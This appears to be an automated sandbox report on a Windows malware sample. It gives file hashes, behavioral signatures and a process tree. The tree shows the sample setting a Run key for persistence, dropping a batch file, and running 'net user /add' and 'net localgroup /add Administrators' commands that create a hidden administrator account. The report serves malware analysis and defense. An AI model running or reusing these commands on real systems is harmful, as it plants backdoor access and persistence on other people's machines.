Analysis
-
max time kernel
140s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
03/02/2024, 00:18
Static task
static1
Behavioral task
behavioral1
Sample
8ae7bb9d6119c991386fa9ed8149c33e.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8ae7bb9d6119c991386fa9ed8149c33e.exe
Resource
win10v2004-20231222-en
General
-
Target
8ae7bb9d6119c991386fa9ed8149c33e.exe
-
Size
54KB
-
MD5
8ae7bb9d6119c991386fa9ed8149c33e
-
SHA1
2647ea011d14a51443c4e83c85e64124ab166d31
-
SHA256
87d19e3bff436f6d204095917f7a2b1dd58d093d637b8cc0a6aa38b761832241
-
SHA512
5239f922e773828896c6bfb98ec0cf1bc9688eadb3e858fa27cb71ed2f691d5e0ada63b8b14ab65139046d887d168f540e8062ff9fdea562cb0db980fc656a21
-
SSDEEP
1536:ts+Zgajv3kHK35Y0RKsZ1Ls3JcBHHx/KboFwbQp8X:tFC4kq35Yds/Ls3JcBnAFby8
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows System Configuration = "C:\\Windows\\SYSCFG16.EXE" 8ae7bb9d6119c991386fa9ed8149c33e.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\SYSCFG16.EXE 8ae7bb9d6119c991386fa9ed8149c33e.exe File opened for modification C:\Windows\SYSCFG16.EXE 8ae7bb9d6119c991386fa9ed8149c33e.exe File created C:\Windows\temp.bat 8ae7bb9d6119c991386fa9ed8149c33e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2920 wrote to memory of 2724 2920 8ae7bb9d6119c991386fa9ed8149c33e.exe 28 PID 2920 wrote to memory of 2724 2920 8ae7bb9d6119c991386fa9ed8149c33e.exe 28 PID 2920 wrote to memory of 2724 2920 8ae7bb9d6119c991386fa9ed8149c33e.exe 28 PID 2920 wrote to memory of 2724 2920 8ae7bb9d6119c991386fa9ed8149c33e.exe 28 PID 2724 wrote to memory of 2728 2724 cmd.exe 30 PID 2724 wrote to memory of 2728 2724 cmd.exe 30 PID 2724 wrote to memory of 2728 2724 cmd.exe 30 PID 2724 wrote to memory of 2728 2724 cmd.exe 30 PID 2728 wrote to memory of 2824 2728 net.exe 31 PID 2728 wrote to memory of 2824 2728 net.exe 31 PID 2728 wrote to memory of 2824 2728 net.exe 31 PID 2728 wrote to memory of 2824 2728 net.exe 31 PID 2724 wrote to memory of 2620 2724 cmd.exe 32 PID 2724 wrote to memory of 2620 2724 cmd.exe 32 PID 2724 wrote to memory of 2620 2724 cmd.exe 32 PID 2724 wrote to memory of 2620 2724 cmd.exe 32 PID 2620 wrote to memory of 2564 2620 net.exe 33 PID 2620 wrote to memory of 2564 2620 net.exe 33 PID 2620 wrote to memory of 2564 2620 net.exe 33 PID 2620 wrote to memory of 2564 2620 net.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"C:\Users\Admin\AppData\Local\Temp\8ae7bb9d6119c991386fa9ed8149c33e.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\temp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\net.exenet user /add System hakt3⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user /add System hakt4⤵PID:2824
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup /add Administrators System3⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup /add Administrators System4⤵PID:2564
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
89B
MD5dccbf9e7aa8e5e8a7d44c634aa4b3e8a
SHA1a2e14c86d1a890f37afe11e0ef02f3b5f05cf3c3
SHA256554c21f981ac2139afa84e5af335c54fce3e0b05db145abef9eb7b2c23612398
SHA5128581f237ce5a9df85ebee9f23fe56f6f27d37c6ea66e9c40cd73b6b85487b6e915f83e5a2740eabed7cd2133c6dca46bd062c5429e2223904ffd9aaff09c8e28